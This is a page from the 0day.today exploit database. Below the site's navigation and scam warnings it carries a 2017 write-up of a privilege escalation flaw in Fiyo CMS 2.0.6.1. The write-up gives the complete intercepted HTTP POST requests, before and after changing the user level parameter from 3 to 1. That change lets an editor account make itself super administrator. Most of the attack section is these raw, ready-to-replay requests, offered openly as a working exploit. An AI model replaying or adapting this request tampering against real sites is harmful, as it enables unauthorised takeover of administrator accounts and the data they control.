0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Fiyo CMS 2.0.6.1 Privilege Escalation Vulnerability
# Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 # Google Dork: no # Date: 11-03-2017 # Exploit Author: @rungga_reksya, @dvnrcy # Vendor Homepage: http://www.fiyo.org # Software Link: https://sourceforge.net/projects/fiyo-cms # Version: 2.0.6.1 # Tested on: Windows Server 2012 Datacenter Evaluation # CVE : no I. Background (Bahasa/Indonesian Language): Fiyo CMS dikembangkan dan dibuat pertama kali oleh mantan seorang pelajar SMK yang pada saat itu bersekolah di SMK 10 Semarang jurusan RPL. Pada zaman itu namanya bukan Fiyo CMS melainkan Sirion yang merupakan akronim dari Site Administration. II. Description: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1 III. Exploit: Fiyo CMS have five user group (super administrator, administrator, editor, publisher, member) and only three group can access backend page of admin (super administrator, administrator and editor). If we login as super administrator and access edit profile menu, check source code (ctrl+u) from your browser and we get level privilege: super administrator = 1 administrator = 2 editor = 3 publisher = 4 member = 5 Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).A The first you access on menu aEdit Profilea and click aSimpan (Save)a, and then change like this on your burpsuite intercept menu: Original: POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1 Host: 192.168.1.2 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 134 edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=3&name=editor&bio= Manipulation (Change Level=3 to be Level=1): POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1 Host: 192.168.1.2 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 134 edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=1&name=editor&bio= Yeaaah, now editor become super administrator privilege and The level of administrator can be super administrator too ^_^ IV. Thanks to: - Alloh SWT - MyBoboboy - MII CAS - Komunitas IT Auditor & IT Security Kaskus # 0day.today [2024-12-24] #